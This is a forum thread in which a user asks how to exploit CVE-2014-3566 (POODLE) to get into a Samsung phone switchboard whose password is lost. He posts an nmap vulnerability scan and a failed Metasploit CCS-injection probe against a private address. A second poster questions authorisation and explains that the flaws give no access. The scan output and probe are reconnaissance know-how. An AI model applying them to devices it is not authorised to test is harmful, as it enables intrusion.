How exploit CVE-2014-3566 step by step

[Nasire]

Hello everyone,
I needed help to exploit this CVE-2014-3566 vulnerability. I needed if someone can help me because I need to enter a device that we don't know the password and it has several vulnerabilities. The one I mentioned is one of them and I needed to know if there is any script that can get me a shell or a session to be able to change the user's password or create a new one.
I hope your help.
Thank you so much.
All the best.

[dark_pyrro]

You have to be more specific. What kind of device? In what way is the CVE relevant to the use case? How do you plan to get a shell on the device in order to change passwords using that CVE? If more vulnerabilities are known, why not list them? Why is the password unknown? Only try to access devices/systems if you have permissions to do so.

[Nasire]

Hi,

You're right. My apologies.
Well, the device is a switchboard that is a few years old from Samsung and we do not know the password because the old administrator is no longer there and no matter how hard we try to reset it to factory settings, we have not succeeded. So I was looking with some of my knowledge with nmap and I discovered that it has vulnerabilities and I was looking for that option to be able to enter it and reset it. The vulnerabilities that nmap shows me with the vuln script are the following:

Nmap scan report for 192.168.x.xx
Host is up (0.0026s latency).
Not shown: 985 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
23/tcp   open  telnet
80/tcp   open  http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_     https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-trace: TRACE is enabled
443/tcp  open  https
| ssl-ccs-injection: 
|   VULNERABLE:
|   SSL/TLS MITM vulnerability (CCS Injection)
|     State: VULNERABLE
|     Risk factor: High
|       OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h
|       does not properly restrict processing of ChangeCipherSpec messages,
|       which allows man-in-the-middle attackers to trigger use of a zero
|       length master key in certain OpenSSL-to-OpenSSL communications, and
|       consequently hijack sessions or obtain sensitive information, via
|       a crafted TLS handshake, aka the "CCS Injection" vulnerability.
|           
|     References:
|       http://www.openssl.org/news/secadv_20140605.txt
|       http://www.cvedetails.com/cve/2014-0224
|_     https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| ssl-poodle: 
|   VULNERABLE:
|   SSL POODLE information leak
|     State: VULNERABLE
|     IDs:  CVE:CVE-2014-3566  BID:70574
|           The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
|           products, uses nondeterministic CBC padding, which makes it easier
|           for man-in-the-middle attackers to obtain cleartext data via a
|           padding-oracle attack, aka the "POODLE" issue.
|     Disclosure date: 2014-10-14
|     Check results:
|       TLS_RSA_WITH_AES_128_CBC_SHA
|     References:
|       https://www.imperialviolet.org/2014/10/14/poodle.html
|       https://www.openssl.org/~bodo/ssl-poodle.pdf
|       https://www.securityfocus.com/bid/70574
|_     https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
| ssl-dh-params: 
|   VULNERABLE:
|   Diffie-Hellman Key Exchange Insufficient Group Strength
|     State: VULNERABLE
|       Transport Layer Security (TLS) services that use Diffie-Hellman groups
|       of insufficient strength, especially those using one of a few commonly
|       shared groups, may be susceptible to passive eavesdropping attacks.
|     Check results:
|       WEAK DH GROUP 1
|             Cipher Suite: TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA
|             Modulus Type: Safe prime
|             Modulus Source: mod_ssl 2.2.x/1024-bit MODP group with safe prime modulus
|             Modulus Length: 1024
|             Generator Length: 8
|             Public Key Length: 1024
|     References:
|_     https://weakdh.org
|_sslv2-drown: ERROR: Script execution failed (use -d to debug)
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
5002/tcp open  rfe
5003/tcp open  filemaker
5030/tcp open  surfpass
5100/tcp open  admd
5101/tcp open  admdog
5102/tcp open  admeng
6000/tcp open  X11
6001/tcp open  X11:1
6002/tcp open  X11:2
6100/tcp open  synchronet-db
8500/tcp open  fmtp

Let's see if someone can help me with this or we will have to throw it away because we need to make changes to it and the technical service asks us for a lot of money so it compensates us to change it.
Thank you very much for your help.
All the best.

 

[dark_pyrro]

I can't see that any of those vulns would be of any benefit since it would just DoS the device or (perhaps) it would be possible to decrypt some communications, but then they have to include any valid credentials which I don't think would happen if there's no one trying to communicate with the device using the password (since it's unknown).

[Nasire]

Hi,

If the truth is there is not much to scratch and especially from a device that cannot be interacted with.
With this vulnerability I got this:
CVE-2014-0224
auxiliary(scanner/ssl/openssl_ccs) > exploit

[*] 192.168.x.xx:443      - Sending Client Hello...
[*] 192.168.x.xx:443      - Sending CCS...
[!] 192.168.x.xx:443      - Unexpected response.
[*] 192.168.x.xx:443      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

I don't know if there is any tool that can exit a shell or a session with this.
If you have any ideas, I appreciate it.
I'm also downloading the sifter tool to see if I can get something.
Many thanks for everything.
All the best.

[dark_pyrro]

Still, you can probably only would hijack an ongoing session and it would require someone/something being active to or from the device and I suspect there's nothing going on there. If you have a device that's relevant for vulns as far back as the end of the first decade of the millennia, I would really ask myself if I would want it in my environment. Better scrap it and get an up to date device. Continuing to use it would most likely be a greater risk even if you could access it properly. I would check if the device is still getting updates/upgrades, and if not, just let it meet the inner world of a junk container.

[Nasire]

Hi,

But once I could access it, I would try to update it and also disconnect it from the network because it is for use with analog phones and you don't need to be connected to the internet. I would be isolated.

Thanks.

A greeting.

[Nasire]

Hi dark_pyrro. Can you help me or do you see it too complicated?